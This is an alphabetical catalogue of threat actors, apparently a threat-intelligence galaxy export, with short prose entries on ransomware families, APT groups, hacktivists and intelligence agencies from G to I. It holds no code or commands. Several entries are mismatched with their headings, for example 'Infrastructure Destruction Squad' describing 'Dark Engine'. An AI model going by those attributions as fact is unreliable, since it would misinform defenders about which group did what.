Guacamaya has conducted multiple hack and leak campaigns against military and police agencies and mining companies across Latin America, which they believe have played a role in the region’s environmental degradation and repression of native populations.
Gunra
Gunra is an emerging ransomware group first identified in April 2025. It employs a classic double-extortion model—encrypting sensitive data and exfiltrating it for publication via a Tor-hosted leak site. Since its emergence, Gunra has struck a diverse set of global targets—reportedly spanning sectors like manufacturing, healthcare, IT, real estate, agriculture, and consulting in countries including Brazil, Japan, Canada, Turkey, South Korea, Taiwan, Egypt, and the U.S.
GURU SPIDER
Early in 2018, CrowdStrike Intelligence observed GURU SPIDER supporting the distribution of multiple crimeware families through its flagship malware loader, Quant Loader.
GusCrypter
ransomware
Guster Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. This ransomware uses VBS-script to send a voice message as the first few lines of the note.
gwisin
Gwisin is a targeted ransomware group first publicly reported in July 2022, believed to operate primarily within South Korea. The group’s name means “ghost” in Korean, reflecting its stealthy approach. Gwisin has been observed conducting attacks on critical sectors, including healthcare, pharmaceutical, and manufacturing industries. It uses custom-built payloads tailored for each victim, capable of encrypting both Windows and Linux/VMware ESXi environments, and often executes attacks during national holidays to maximize operational disruption. Gwisin employs a double-extortion model—exfiltrating sensitive data before encryption—and communicates with victims in Korean-language ransom notes. Initial access vectors are not fully confirmed in open-source reporting, but suspected methods include exploiting vulnerable VPN appliances and leveraging stolen administrative credentials. The group is known for extensive pre-encryption reconnaissance to identify high-value systems and backups.
GwisinLocker
Ransomware
GX40
ransomware
GXC Team
According to Resecurity researchers, GXC Team is a cybercriminal actor group that specializes in the development of tools used for financial fraud and theft. The group's leader operates and advertises these tools for sale on dark web forums under the alias "googleXcoder".[[Resecurity GXC Team January 3 2024](/references/6d55aa2c-3f52-4bff-8003-f78b386a4952)]
H0lyGh0st Ransomware Group
H0lyGh0st is a North Korea-based ransomware-focused threat actor group.[[H0lyGh0st - North Korean Threat Group Strikes Back With New Ransomware](/references/3f66ef62-ac0d-4ece-9a4b-917ae70f1617)]
H34rtBl33d
ransomware
HackdoorCrypt3r
ransomware
Hacked
Ransomware Jigsaw Ransomware variant
HackedLocker Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… NO POINT OF PAYING THE RANSOM—THE HACKER DOES NOT GIVE A DECRYPT AFTERWARDS.
Hacking Team
The many 0-days that had been collected by Hacking Team and which became publicly available during the breach of their organization in 2015, have been used by several APT groups since. Since being founded in 2003, the Italian spyware vendor Hacking Team gained notoriety for selling surveillance tools to governments and their agencies across the world. The capabilities of its flagship product, the Remote Control System (RCS), include extracting files from a targeted device, intercepting emails and instant messaging, as well as remotely activating a device’s webcam and microphone. The company has been criticized for selling these capabilities to authoritarian governments – an allegation it has consistently denied. When the tables turned in July 2015, with Hacking Team itself suffering a damaging hack, the reported use of RCS by oppressive regimes was confirmed. With 400GB of internal data – including the once-secret list of customers, internal communications, and spyware source code – leaked online, Hacking Team was forced to request its customers to suspend all use of RCS, and was left facing an uncertain future. Following the hack, the security community has been keeping a close eye on the company’s efforts to get back on its feet. The first reports suggesting Hacking Team’s resumed operations came six months later – a new sample of Hacking Team’s Mac spyware was apparently in the wild. A year after the breach, an investment by a company named Tablem Limited brought changes to Hacking Team’s shareholder structure, with Tablem Limited taking 20% of Hacking Team’s shareholding. Tablem Limited is officially based in Cyprus; however, recent news suggests it has ties to Saudi Arabia.
Hades
ransomware
Hagga
Hagga is believed to have been using Agent Tesla, 2021’s sixth most prevalent malware, to steal sensitive information from his victims since the latter part of 2021.
Hakbit
ransomware
Halloware
A malware author by the name of Luc1F3R is peddling a new ransomware strain called Halloware for the lowly price of $40. Based on evidence gathered by Bleeping Computer, Luc1F3R started selling his ransomware this week, beginning Thursday.
Handala
Handala is a pro-Palestinian hacktivist group that targets Israeli organizations, employing tactics such as phishing, data theft, extortion, and destructive attacks using custom wiper malware. The group utilizes a multi-stage loading process, including a Delphi-coded second-stage loader and an AutoIT injector, to deliver wiper malware that specifically targets Windows and Linux environments. Their phishing campaigns often exploit major events and critical vulnerabilities, masquerading as legitimate organizations to gain initial access. Handala operates a data leak site to publicize stolen data, although claims of successful attacks are sometimes disputed by targeted organizations.
HappyCrypter
ransomware
HappyDayzz
Ransomware
Harasom
Ransomware
Haron
login page, no posts
Havoc
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, infected attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures , videos, shared online files etc..
Haze
ransomware
HAZY TIGER
The Bitter threat group initially started using RAT tools in their campaigns, as the first Bitter versions, for Android released in 2014 were based on the AndroRAT framework. Over time, they switched to a custom version that has been known as BitterRAT ever since.
HC6
Predecessor of HC7
HC7
A new ransomware called HC7 is infecting victims by hacking into Windows computers that are running publicly accessible Remote Desktop services. Once the developers gain access to the hacked computer, the HC7 ransomware is then installed on all accessible computers on the network. Originally released as HC6, victims began posting about it in the BleepingComputer forums towards the end of November. As this is a Python-to-exe executable, once the script was extracted ID Ransomware creator Michael Gillespie was able determine that it was decryptable and released a decryptor. Unfortunately, a few days later, the ransomware developers released a new version called HC7 that was not decryptable. Thi sis because they removed the hard coded encryption key and instead switched to inputting the key as a command line argument when the attackers run the ransomware executable. Thankfully, there may be a way to get around that as well so that victims can recover their keys.
HCrypto
ransomware
HDDCryptor
Ransomware Uses https://diskcryptor.net for full disk encryption
HDLocker
ransomware
Head Mare
Head Mare is a hacktivism focussed threat actor group known for targeting Russia and Belarus sectors using a remote access malware called PhantomRAT. They have been observed executing malicious code through specially crafted RAR archives, different from previous attacks exploiting vulnerabilities. The attribution of their campaign to Ukraine is uncertain due to limited visibility inside Russian networks. PhantomCore's use of RAR archives in their attack chain has been previously observed in other threat actor groups like Forest Blizzard.
Heeresnachrichtenamt
Heeresnachrichtenamt (HNA): Army Intelligence Office
Heimdall
Ransomware File marker: "Heimdall---"
Hellcat
HellCat is a relatively recent ransomware group first observed in late 2024, known for its data-theft and extortion campaigns targeting high-profile organizations. It operates a double-extortion model, exfiltrating sensitive information and threatening to publish it on its Tor-based leak site if ransom demands are not met. The group has been linked to multiple significant breaches, including incidents involving Schneider Electric and Capgemini, where large volumes of corporate data were allegedly stolen. HellCat’s payloads and leak infrastructure suggest a custom-built platform rather than a widely shared RaaS, and some incidents have involved only data exposure without confirmed encryption events. The group has drawn attention for recruiting or collaborating with high-profile threat actors, including the persona “Grep,” who acts as a public representative in some extortion cases.
Helldown
Helldown is an emerging ransomware group first identified in August 2024, known for its fast-evolving and cross-platform threat capabilities. It exploits critical vulnerabilities—most notably CVE-2024-42057 in Zyxel firewalls—for initial access and demonstrates modular design and anti-detection mechanisms. Helldown targets both Windows and Linux environments, including VMware and ESXi systems. It employs a double-extortion strategy: encrypting files with randomized extensions via executables like hellenc.exe, and threatening victims with data dump releases via its Tor-hosted leak site.
HellHounds
Hellhounds is an APT group targeting organizations in Russia, using a modified version of Pupy RAT called Decoy Dog. They gain initial access through vulnerable web services and trusted relationships, with a focus on the public sector and IT companies. The group has been active since at least 2019, maintaining covert presence inside compromised organizations by modifying open-source projects to evade detection. Hellhounds have successfully targeted at least 48 victims, including a telecom operator where they disrupted services.
Hellogookie
Hellogookie is an active extortion or ransomware group tracked by RansomLook.
HelloKitty
ransomware
HelloXD
HelloXD is a ransomware family performing double extortion attacks that surfaced in November 2021. During our research we observed multiple variants impacting Windows and Linux systems. Unlike other ransomware groups, this ransomware family doesn’t have an active leak site; instead it prefers to direct the impacted victim to negotiations through TOX chat and onion-based messenger instances.
Hellsing
This threat actor uses spear-phishing techniques to compromise diplomatic targets in Southeast Asia, India, and the United States. It also seems to have targeted the APT 30. Possibly uses the same infrastructure as Mirage
HELP@AUSI
ransomware
Help_dcfile
Ransomware
help_restoremydata
.help_restoremydata
ext : .help_restoremydata
note : HOW_TO_RECOVERY_FILES.html
mail : help@restoremydata.pw
md5 : b1e8b6c2b65d51893bbe61d46cbdb4af
HelpMe
ransomware
HenBox
This threat actor targets Uighurs—a minority ethnic group located primarily in northwestern China—and devices from Chinese mobile phone manufacturer Xiaomi, for espionage purposes.
Herbst
Ransomware
Hermes Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Filemarker: "HERMES"
hermes
Hermes is a ransomware family first observed in the wild in February 2017, believed to have been developed by a group operating out of Asia. It originally appeared as a Ransomware-as-a-Service (RaaS) offering on underground forums but later saw deployment in targeted attacks. Hermes uses AES-256 encryption to lock victim files and appends a variety of extensions (including .hrm and campaign-specific variants). The ransom note, often named DECRYPT_INFORMATION.html or DECRYPT_INFORMATION.txt, provides payment instructions via email. The ransomware gained notoriety in 2018 when it was used as a destructive wiper in the Far Eastern International Bank (FEIB) heist in Taiwan, where attackers deployed Hermes to cover their tracks after a SWIFT fraud operation. Over time, Hermes code has been re-used and integrated into other ransomware families, including some Ryuk builds, suggesting code sharing or purchase from the original developer. Distribution vectors have included phishing campaigns, malicious attachments, and exploitation of RDP services.
Hermes837
ransomware
HermesVirus HT
ransomware
Heropoint
ransomware
HexagonalRodent
HexagonalRodent targets Web3 developers to steal crypto assets, employing social engineering tactics such as fake job offers. They utilize malware like BeaverTail and OtterCookie, both NodeJS-based toolkits, and InvisibleFerret, a Python-based RAT, to execute their attacks. Their TTPs include backdooring skills assessments via VSCode's tasks.json feature and conducting opportunistic exfiltration of credentials and crypto wallets. The group has also engaged in a supply chain attack, compromising the 'fast-draft' VSX extension to install malware.
Hezb
Hezb is a group deploying cryptominers when new exploit are available for public facing vulnerabilities. The name is after the miner process they deploy.
Hi Buddy!
Ransomware Based on HiddenTear
HiddenArt
It was observed that a mobile network threat actor designated as ‘HiddenArt’ actively sustains a capacity to remotely access the personal devices of targeted individuals around the world on an ongoing basis. Since detecting this threat actor, periodic reconnaissance activities were observed in at least 7 target mobile networks around the world and given the wide geographic distribution of these targeted mobile operators, it is probable that the threat actor is active on a global scale.
HiddenBeer
ransomware
HiddenTear
Ransomware Open sourced C#
HikkI-Chan
Hikki-Chan has claimed responsibility for multiple significant data breaches, including the theft of data from 390.4 million users of VKontakte, which included sensitive personal information. The actor has also targeted Strong Current Enterprises and disclosed a breach involving the Israeli Ministry of Welfare and Social Affairs, leaking over 457,000 records. Additionally, Hikki-Chan is attributed with a breach of the Florida Office of Financial Regulation, exposing tens of thousands of records across various industries.
Hildacrypt
The Hildacrypt ransomware encrypts the victim’s files with a strong encryption algorithm and the filename extension .hilda until the victim pays a fee to get them back.
Himalayaa
Himalayaa is an active extortion or ransomware group tracked by RansomLook.
Hitler
Ransomware Deletes files
HIVE-0145
Hive0145 is a financially motivated initial access broker that has been active since late 2022, primarily utilizing Strela Stealer malware to target email credentials. The group has evolved its tactics from generic phishing emails to using stolen legitimate emails with real invoice attachments, focusing on victims in Spain, Germany, and Ukraine. Strela Stealer is configured to extract data from Microsoft Outlook and Mozilla Thunderbird, and the group's operations have shown increased complexity and automation. Threat intelligence indicates that Hive0145's campaigns are characterized by credential theft and espionage-driven activities.
Hive Ransomware Actors
This Group object reflects the tools & TTPs associated with threat actors known to deploy Hive, a ransomware-as-a-service (RaaS) variant first observed in June 2021.[[U.S. CISA Hive November 25 2022](/references/fce322e6-5e23-404a-acf8-cd003f00c79d)] Specific pre- and post-compromise behaviors may vary among intrusions carried out by different Hive affiliates. Hive actors have targeted victims in a wide range of verticals, including the government, communications, manufacturing, information technology, financial services, education, and especially the healthcare sectors. In January 2023, international authorities announced they disrupted Hive ransomware operations, seizing control of servers and websites used for communication among Hive actors and capturing Hive decryption keys.[[U.S. Justice Department Hive January 2023](/references/81bd5579-6a8a-40d2-b7b7-5cdb879ebdf0)]
Hive
First observed in June 2021, Hive ransomware was originally written in GoLang but recently, new Hive variants have been seen written in Rust. Targets Healthcare sector.
Hive0117
Hive0117 is a financially motivated cybercriminal group that conducts phishing campaigns to deliver the fileless malware DarkWatchman, which is capable of keylogging and collecting system information. The group targets individuals in the energy, finance, transport, and software security sectors across Russia, Kazakhstan, Latvia, and Estonia, often imitating official Russian government communications to induce urgency. Their operations leverage emergent policies related to conscription and utilize a UID string for identification, with malware capable of querying for smartcard readers, indicating a focus on higher security targets. The malware's fileless nature and ability to erase traces of its presence suggest moderate sophistication in their TTPs.
Hive0137
Being one of the most active malware distributors, Hive0137 demonstrates a willingness to explore new payloads and technologies such as GenAI. They have quickly moved onto the same level as other high-profile distributors such as TA577, and will likely be responsible for future phishing campaigns, facilitating initial access for ransomware affiliates. Hive0137’s combination of intent, capabilities and relationships with other groups presents a direct threat to organizations all over the world. As threat actors pick up the pace and increasingly adopt AI technologies for malicious purposes, it is important that organizations are aware of the most recent threats and their capabilities to maintain a strong security posture.
Hive0163
Hive0163 is a financially motivated ransomware group responsible for deploying Interlock ransomware, utilizing ClickFix social engineering for initial access. They employ the AI-generated PowerShell backdoor Slopoly for persistent command-and-control access, which checks in with attacker infrastructure every 50 seconds and transmits telemetry every 30 seconds. The group leverages AzCopy for bulk data exfiltration to Azure blob storage before executing ransomware, employing a five-stage attack chain. Their operations are characterized by the use of initial access brokers and a variety of custom backdoors for long-term access and data exfiltration.
Hog
ransomware
HolidayCheer
ransomware
HollowQuill
SEQRITE Labs APT-Team has been tracking and has uncovered a campaign targeting the Baltic State Technical University, a well-known institution for various defense, aerospace, and advanced engineering programs that contribute to Russia’s military-industrial complex. Tracked as Operation HollowQuill, the campaign leverages weaponized decoy documents masquerading as official research invitations to infiltrate academic, governmental, and defense-related networks. The threat entity delivers a malicious RAR file which contains a .NET malware dropper, which further drops other Golang based shellcode loader along with legitimate OneDrive application and a decoy-based PDF with a final Cobalt Strike payload.
Hollycrypt Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
HolyCrypt
Ransomware
holyghost
HolyGhost is a ransomware group first publicly reported in July 2022, believed to be operated by a North Korean state-sponsored threat actor tracked as APT43 or Andariel, a subgroup of the Lazarus Group. The group has been active since at least June 2021, using a double-extortion model that combines encryption of victim files with threats to leak stolen data via a Tor site. Early HolyGhost variants (BTLC_C.exe) used a custom file extension .h0lyenc, while later builds added more robust encryption, obfuscation, and evasion capabilities. Targeted victims include small and medium-sized businesses in manufacturing, finance, education, and event planning, primarily in the United States, South Korea, Brazil, and India. Intrusion methods include exploitation of vulnerable public-facing applications, credential theft, and possibly the use of purchased access from other threat actors. Unlike purely criminal groups, HolyGhost is suspected of being leveraged for both revenue generation and strategic cyber operations in support of DPRK objectives.
HomeLand Justice
HomeLand Justice is an Iranian state-sponsored cyber threat group that has been active since at least May 2021. They have targeted various organizations, including a well-known telecommunication company and the Albanian Parliament. The group engaged in information operations and messaging campaigns to amplify the impact of their attacks.
Homeland
Homeland is an active extortion or ransomware group tracked by RansomLook.
Honeybee
McAfee Advanced Threat Research analysts have discovered a new operation targeting humanitarian aid organizations and using North Korean political topics as bait to lure victims into opening malicious Microsoft Word documents. Our analysts have named this Operation Honeybee, based on the names of the malicious documents used in the attacks. Advanced Threat Research analysts have also discovered malicious documents authored by the same actor that indicate a tactical shift. These documents do not contain the typical lures by this actor, instead using Word compatibility messages to entice victims into opening them. The Advanced Threat Research team also observed a heavy concentration of the implant in Vietnam from January 15–17.
Honor
ransomware
HookAds
HookAds is a malvertising campaign that purchases cheap ad space on low quality ad networks commonly used by adult web sites, online games, or blackhat seo sites. These ads will include JavaScript that redirects a visitor through a serious of decoy sites that look like pages filled with native advertisements, online games, or other low quality pages. Under the right circumstances, a visitor will silently load the Fallout exploit kit, which will try and install its malware payload.
Horros
ransomware
Hotarus
Hotarus is a ransomware and data extortion group first observed in March 2021, believed to be linked to threat actors of Latin American origin. The group has targeted entities in South America and the United States, including financial institutions, government agencies, and private companies. Hotarus is known for deploying both custom ransomware and publicly available tools, alongside stealing sensitive information for double-extortion purposes. The group has been observed exploiting vulnerable web services, using stolen credentials, and leveraging publicly available post-exploitation frameworks to gain persistence in victim networks. Encrypted files are typically appended with extensions such as .hotarus or campaign-specific identifiers, and ransom notes direct victims to communicate via encrypted email services. Notably, in some campaigns, Hotarus deployed data leak threats without encrypting files, focusing solely on exposure as a pressure tactic.
Houken
Houken is a Chinese state-sponsored threat actor that exploits zero-day vulnerabilities in Ivanti Cloud Services Appliance devices to gain initial access to critical infrastructure networks, particularly in France. The group employs a sophisticated rootkit alongside open-source tools, primarily developed by Chinese-speaking authors, to maintain persistence and control over compromised systems. Houken is suspected to operate as an initial access broker, selling footholds in targeted networks to other threat actors for further exploitation.
HOUND SPIDER
According to Crowdstrike, HOUND SPIDER affiliates arrested in Romania on December,2017
Houndstooth Typhoon
Microsoft threat actor profile. Origin/Threat: China.
HowAreYou
ransomware
HPE iLO 4 Ransomware
Attackers are targeting Internet accessible HPE iLO 4 remote management interfaces, supposedly encrypting the hard drives, and then demanding Bitcoins to get access to the data again. According to the victim, the attackers are demanding 2 bitcoins to gain access to the drives again. The attackers will also provide a bitcoin address to the victim that should be used for payment. These bitcoin addresses appear to be unique per victim as the victim's was different from other reported ones. An interesting part of the ransom note is that the attackers state that the ransom price is not negotiable unless the victim's are from Russia. This is common for Russian based attackers, who in many cases tries to avoid infecting Russian victims. Finally, could this be a decoy/wiper rather than an actual true ransomware attack? Ransomware attacks typically provide a unique ID to the victim in order to distinguish one victim from another. This prevents a victim from "stealing" another victim's payment and using it to unlock their computer. In a situation like this, where no unique ID is given to identify the encrypted computer and the email is publicly accessible, it could be a case where the main goal is to wipe a server or act as a decoy for another attack.
HSHARADA
The ransomware was identified in early April 2023 and is said to target English-speaking users and potentially other languages. The extension added to encrypted files is: ".m9SRob" (potentially random). The ransom note is named "m9SRob-README.txt". There are no further details about the mentioned group or potentially files. The fact is that it adds an ID for each victim.
HTCryptor
Ransomware Includes a feature to disable the victim's windows firewall Modified in-dev HiddenTear
Hucky Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on Locky
HugeMe Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
HummingBad
This group created a malware that takes over Android devices and generates $300,000 per month in fraudulent ad revenue. The group effectively controls an arsenal of over 85 million mobile devices around the world. With the potential to sell access to these devices to the highest bidder
Hunt
Hunt ransomware is a variant of the Dharma/CrySIS ransomware family. This variant creates a unique ID for each victim, appends the extension '.hunt' to encrypted files, and leaves a ransom note known as info-hunt.txt. The Dharma/CrySIS ransomware family emerged around mid-2016 as a Ransomware-as-a-Service (RaaS) program, utilizing various initial intrusion methods such as phishing, disguising as legitimate software, and exploiting open RDP connections. This variant uses AES-256 encryption (CBC mode) or DES+RSA and demands payment to recover files. Upon execution, the ransomware generates a 256-bit AES decryption key, which is then encrypted along with random bytes using the RSA-1024 algorithm and stored at the end of the encrypted file. The ransomware is written in C/C++ and compiled using MS Visual Studio. Regarding geographic attribution, it has been identified in use by threat actors from Russia, Ukraine, India, and other countries.
Hunt3r Kill3rs
Hunt3r Kill3rs is a newly emerged threat group claiming expertise in cyber operations, including ICS breaches and web application vulnerabilities exploitation. They have discussed using Java fuzzing in their exploits and have made unverified claims of joint attacks with other threat actors.
Hunters
Hunters International is a ransomware group first identified in October 2023, believed to have taken over or rebranded from the now-defunct Hive ransomware operation. Shortly after its emergence, security researchers found significant code overlaps with Hive, suggesting that Hunters International either acquired Hive’s source code or involved former Hive developers. The group operates a double-extortion model—encrypting victim data and threatening to leak it on a Tor-based site. It has targeted organizations worldwide across healthcare, manufacturing, education, and government sectors. The ransomware is written in Rust, supports both Windows and Linux/ESXi environments, and appends extensions such as .locked to encrypted files. Initial access is typically obtained via compromised RDP credentials, phishing campaigns, or vulnerabilities in exposed systems.
HURRICANE PANDA
We have investigated their intrusions since 2013 and have been battling them nonstop over the last year at several large telecommunications and technology companies. The determination of this China-based adversary is truly impressive: they are like a dog with a bone. HURRICANE PANDA's preferred initial vector of compromise and persistence is a China Chopper webshell – a tiny and easily obfuscated 70 byte text file that consists of an ‘eval()’ command, which is then used to provide full command execution and file upload/download capabilities to the attackers. This script is typically uploaded to a web server via a SQL injection or WebDAV vulnerability, which is often trivial to uncover in a company with a large external web presence. Once inside, the adversary immediately moves on to execution of a credential theft tool such as Mimikatz (repacked to avoid AV detection). If they are lucky to have caught an administrator who might be logged into that web server at the time, they will have gained domain administrator credentials and can now roam your network at will via ‘net use’ and ‘wmic’ commands executed through the webshell terminal.
Hydra
ransomware
HydraCrypt
Ransomware CrypBoss Family
Hyflock
Hyflock is an active extortion or ransomware group tracked by RansomLook.
Icarus
Icarus is an active extortion or ransomware group tracked by RansomLook.
Icefire
Icefire is an active extortion or ransomware group tracked by RansomLook.
Icelandic Crisis Response Unit
Icelandic Defense Agency's Analysis Unit – Greiningardeild Varnarmálastofnunar Íslands (GVMSÍ) (Defunct)
Icelandic Police
The National Police Commissioner's Analysis Unit – Greiningardeild Ríkislögreglustjóra (GRLS)
IcePeony
IcePeony is a China-nexus APT group that has been active since at least 2023, targeting government agencies, academic institutions, and political organizations in countries such as India, Mauritius, and Vietnam. They primarily employ SQL injection techniques to exploit vulnerabilities in publicly accessible web servers, subsequently installing web shells or executing malware like IceCache to facilitate credential theft. IcePeony operates under harsh work conditions, potentially adhering to the 996 working hour system, and shows a particular interest in the governments of Indian Ocean countries. Their activities suggest alignment with China's national interests, possibly related to maritime strategy.
id:Badan Intelijen dan Keamanan Kepolisian Negara Republik Indonesia
Indonesian National Police Intelligence and Security Agency - Badan Intelijen dan Keamanan Kepolisian Negara Republik Indonesia
IFN643 Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
IGotYou
ransomware
iGZa4C
ransomware
ILElection2020
ransomware
iLock
Ransomware
iLockLight
Ransomware
Immuni
ransomware
Imn Crew
Imn Crew is an active extortion or ransomware group tracked by RansomLook.
IMPERSONATING PANDA
IMPERSONATING PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Ims00ry
ransomware
ImSorry
ransomware
Incanto
ransomware
Inception Framework
This threat actor uses spear-phishing techniques to target private-sector energy, defense, aerospace, research, and media organizations and embassies in Africa, Europe, and the Middle East, for the purpose of espionage.
Indian Army
Directorate of Military Intelligence
INDOHAXSEC TEAM
INDOHAXSEC TEAM is an Indonesian group that claims to have developed a web-based version of WannaCry, asserting the ability to encrypt websites and demand Bitcoin as ransom. However, their technical capabilities remain uncertain, as creating ransomware of this scale requires significant expertise. The group's claims may be exaggerated for attention, and verified evidence is needed to assess their true capabilities.
Indonesian Army Intelligence Centre
Indonesian Army Intelligence Centre (PUSINTELAD) – Pusat Intelijen Tentara Nasional Indonesia Angkatan Darat
Indonesian Financial Transaction Reports and Analysis Center
Indonesian Financial Transaction Reports and Analysis Center (PPATK) – Pusat Pelaporan dan Analisis Transaksi Keuangan
Indonesian Strategic Intelligence Agency
Indonesian Strategic Intelligence Agency (BAIS) – Badan Intelijen Strategis Tentara Nasional Indonesia
Indrik
ransomware
InducVirus
ransomware
InfinityLock
ransomware
InfoDot
ransomware
Információs Hivatal
Információs Hivatal (IH) (Information Office)
Information and Security Service of the Republic of Moldova
Information and Security Service (SIS)[18]
Infrastructure Destruction Squad
Dark Engine has emerged as a significant threat actor targeting industrial control systems and SCADA systems in sectors such as metallurgy and food processing. The group has conducted multiple ICS-targeted incidents, with a pronounced operational surge in June 2025. Additionally, Dark Engine is involved in a campaign that embeds fraudulent CAPTCHA prompts into legitimate WordPress sites, utilizing SEO poisoning to harvest login credentials. Reports also indicate a data leak from Dark Engine that exposed sensitive phone data in the U.S.
Infy
Infy is a group of suspected Iranian origin. Since early 2013, we have observed activity from a unique threat actor group, which we began to investigate based on increased activities against human right activists in the beginning of 2015. In line5with other research on the campaign, released prior to publication of this document, we have adopted the name “Infy”, which is based on labels used in the infrastructure and its two families of malware agents. Thanks to information we have been able to collect during the course of our research, such as characteristics of the group’s malware and development cycle, our research strongly supports the claim that the Infy group is of Iranian origin and potentially connected to the Iranian state. Amongst a backdrop of other incidents, Infy became one of the most frequently observed agents for attempted malware attacks against Iranian civil society beginning in late 2014, growing in use up to the February 2016 parliamentary election in Iran. After the conclusion of the parliamentary election, the rate of attempted intrusions and new compromises through the Infy agent slowed, but did not end. The trends witnessed in reports from recipients are reinforced through telemetry provided by design failures in more recent versions of the Infy malware.
INJ3CTOR3
INJ3CTOR3 is a threat actor first identified in 2020, known for targeting vulnerabilities in VoIP systems, specifically CVE-2019-19006 and CVE-2021-45461. Their operations involve exploiting FreePBX vulnerabilities to deploy PHP web shells for data exfiltration and persistence. The group utilizes tools for SIP server exploitation, including brute-force scripts and authentication bypass techniques. Observations indicate a resurgence of their attack patterns, reflecting historical behaviors while adapting to current vulnerabilities.
INPIVX
ransomware
insane ransomware
Insane is a relatively obscure ransomware family first reported in late 2021, with few confirmed incidents in public threat intelligence. It encrypts victim files using symmetric encryption (AES) combined with RSA for key protection and appends the .insane extension to affected files. The ransom note, typically named INSANE_README.txt, directs victims to contact the operators via email for decryption instructions. Based on limited reporting, Insane does not appear to operate as a Ransomware-as-a-Service (RaaS) platform; instead, it seems to be deployed by the core operators in targeted attacks. Initial access methods are not well-documented, but suspected vectors include phishing attachments and exploitation of exposed RDP services. The group’s small footprint in open-source intelligence suggests limited distribution or use in highly selective campaigns.
InsaneCrypt
ransomware
Insomnia
Insomnia is an active extortion or ransomware group tracked by RansomLook.
InstallPay
ransomware
Institutional Security Bureau
Gabinete de Segurança Institucional (Institutional Security Bureau) (GSI) Responds directly to the president's office and the armed forces. Coordinates some intelligence operations.
IntelBroker
IntelBroker is a threat actor known for orchestrating high-profile data breaches targeting companies like Apple, Zscaler, and Facebook Marketplace. They have a reputation for selling access to compromised systems and data on underground forums like BreachForums. IntelBroker has claimed responsibility for breaches involving government agencies such as Europol, the U.S. Department of Transportation, and the Pentagon, leaking sensitive information and classified documents. The actor has been linked to breaches at companies like Acuity, General Electric, and Home Depot, showcasing a pattern of targeting critical infrastructure and major corporations.
Inteligencia de la Gendarmería Nacional Argentina
Argentine National Gendarmerie Intelligence (SIGN) – Inteligencia de la Gendarmería Nacional Argentina
Inteligencia de la Policía Bonaerense
Buenos Aires Police Intelligence (SIPBA) (Buenos Aires Police Intelligence) – Inteligencia de la Policía Bonaerense
Inteligencia de la Policía de Seguridad Aeroportuaria
Airport Security Police Intelligence – Inteligencia de la Policía de Seguridad Aeroportuaria
Inteligencia de la Policía Federal Argentina
Argentine Federal Police Intelligence – Inteligencia de la Policía Federal Argentina
Inteligencia de la Prefectura Naval Argentina
Argentine Naval Prefecture Intelligence (SIPN) – Inteligencia de la Prefectura Naval Argentina
Inteligencia del Servicio Penitenciario Federal
Federal Penitentiary Service Intelligence – Inteligencia del Servicio Penitenciario Federal
Intelligence Agency of North Macedonia
Intelligence Agency (Agencija za Razuznavanje) (Civilian Agency) IA
Intelligence and Counter-Terrorism Directorate - Ministry of Interior
Intelligence and Counter-Terrorism Directorate - Ministry of Interior
Intelligence and Security Service of Slovenian Ministry of Defence - Obveščevalno Varnostna Služba (OVS)[26]
Intelligence and Security Service of Slovenian Ministry of Defence - Obveščevalno Varnostna Služba (OVS)[26]
Intelligence Branch
Intelligence Branch
Intelligence Bureau (IB)
Intelligence Bureau (IB)
Intelligence Bureau (India)
Intelligence Bureau (IB)
Intelligence Bureau (Pakistan)
Intelligence Bureau (IB)
Intelligence Directorate
Dirección General de Inteligencia (DGI)
Intelligence Division (Finland)
Defense Command Intelligence Division – Pääesikunnan tiedusteluosasto (PE TIEDOS) / Huvudstabens underrättelseavdelning)
Intelligence org of FARAJA
Intelligence org of FARAJA
Intelligence org of the Islamic Republic of Iran[12]
Intelligence org of the Islamic Republic of Iran[12]
Intelligence Organization of Army of the Guardians of the Islamic Revolution
Intelligence Organization of IRGC
Intelligence Protection Organization of Army of the Guardians of the Islamic Revolution
Intelligence Protection Organization of IRGC (SAHEFASA)
Intelligence Protection Organization of Islamic Republic of Iran Army
Intelligence Protection Organization of Iranian Army (SAHEFAJA)
Intelligence-Security Agency of Bosnia and Herzegovina
Intelligence-Security Agency of Bosnia and Herzegovina (OSA)
Inter-Services Intelligence
Inter-Services Intelligence (ISI)
Interlock
Interlock is an active extortion or ransomware group tracked by RansomLook.
Internal Security Affairs Bureau (ISAB)
Internal Security Affairs Bureau (ISAB)
Internal Security Department (Brunei)
Internal Security Department (Brunei)[4] (internal)
Internal Security Department (Singapore)
Internal Security Department (ISD)
Internal Security Operations Command
Internal Security Operations Command (ISOC)
Internal Security Service
Internal Security Service [Internal Security]
International Liaison Department of the Chinese Communist Party
International Department (ID)
International Police Association
Ransomware CryptoTorLocker2015 variant
Invaderx
Invaderx is an active extortion or ransomware group tracked by RansomLook.
InvisiMole
Adversary group targeting diplomatic missions, governmental and military organisations, mainly in Ukraine.
IPA
ransomware
iRansom
Ransomware
Iraqi National Intelligence Service
Iraqi National Intelligence Service - (INIS) - (Foreign intelligence and Special operations)
IRIDIUM
